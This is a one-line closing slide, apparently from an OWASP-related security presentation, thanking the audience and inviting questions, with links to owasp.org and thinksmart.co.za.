  • OWASP Thank You! Questions?www.owasp.org www.thinksmart.co.za